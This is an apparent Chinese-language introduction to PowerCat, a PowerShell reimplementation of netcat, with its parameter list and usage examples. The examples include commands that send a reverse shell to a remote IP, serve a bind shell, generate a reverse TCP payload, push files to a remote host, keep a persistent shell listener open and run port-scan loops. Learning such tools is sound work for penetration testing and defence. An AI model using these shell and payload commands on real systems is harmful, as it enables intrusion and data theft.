PowerCat – powershell的瑞士军刀（netcat）

项目地址

https://github.com/secabstraction/PowerCat

项目介绍

PowerCat是一个powershell写的tcp/ip瑞士军刀，看一看成ncat的powershell的实现，然后里面也加入了众多好用的功能，如文件上传，smb协议支持，中继模式，生成payload，端口扫描等等。

使用方法

支持的方法如下

Start-PowerCat # Starts a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb.
-Port # The port to listen on.
-PipeName # Name of pipe to listen on.

-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: “<Mode>:<Port/PipeName>”
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-KeepAlive # Restart after disconnecting.
-Timeout # Timeout option. Default: 60 seconds

Connect-PowerCat # Connects a client to a listener/server.

-Mode # Defaults to Tcp, can also specify Udp or Smb
-RemoteIp # IPv4 address of host to connect to.
-Port # The port to connect to.
-PipeName # Name of pipe to connect to.

-SslCn # Common name for Ssl encrypting Tcp.
-Relay # Format: “<Mode>:<IP>:<Port/PipeName>”
-Execute # Execute a console process or powershell.
-SendFile # Filepath of file to send.
-ReceiveFile # Filepath of file to be written.
-Disconnect # Disconnect after connecting.
-Timeout # Timeout option. Default: 60 seconds

最基础的连接与监听模式：

# Basic Listener:
Start-PowerCat -Port 443

# Basic Client:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443

发送与接受文件

# Send File:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -SendFile C:\pathto\inputfile

# Receive File:
Start-PowerCat -Port 443 -ReceiveFile C:\pathto\outputfile

正向与反向shell

# Serve a shell:
Start-PowerCat -Port 443 -Execute

# Send a Shell:
Connect-PowerCat -RemoteIp 10.1.1.1 -Port 443 -Execute

payload生成

# Generate a reverse tcp payload that connects back to 10.1.1.15 port 443:
New-PowerCatPayload -RemoteIp 10.1.1.15 -Port 443 -Execute

# Generate a tcp payload that listens on port 8000:
New-PowerCatPayload -Listener -Port 8000 -Execute

端口扫描

# Basic TCP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose -Disconnect }

# Basic UDP port scan:
1..1024 | ForEach-Object { Connect-PowerCat -Mode Udp -RemoteIp 10.1.1.10 -Port $_ -Timeout 1 -Verbose }

# Persistent listener:
Start-PowerCat -Port 443 -Execute -KeepAlive

# Simple Web Server:
Start-PowerCat -Port 80 -SendFile index.html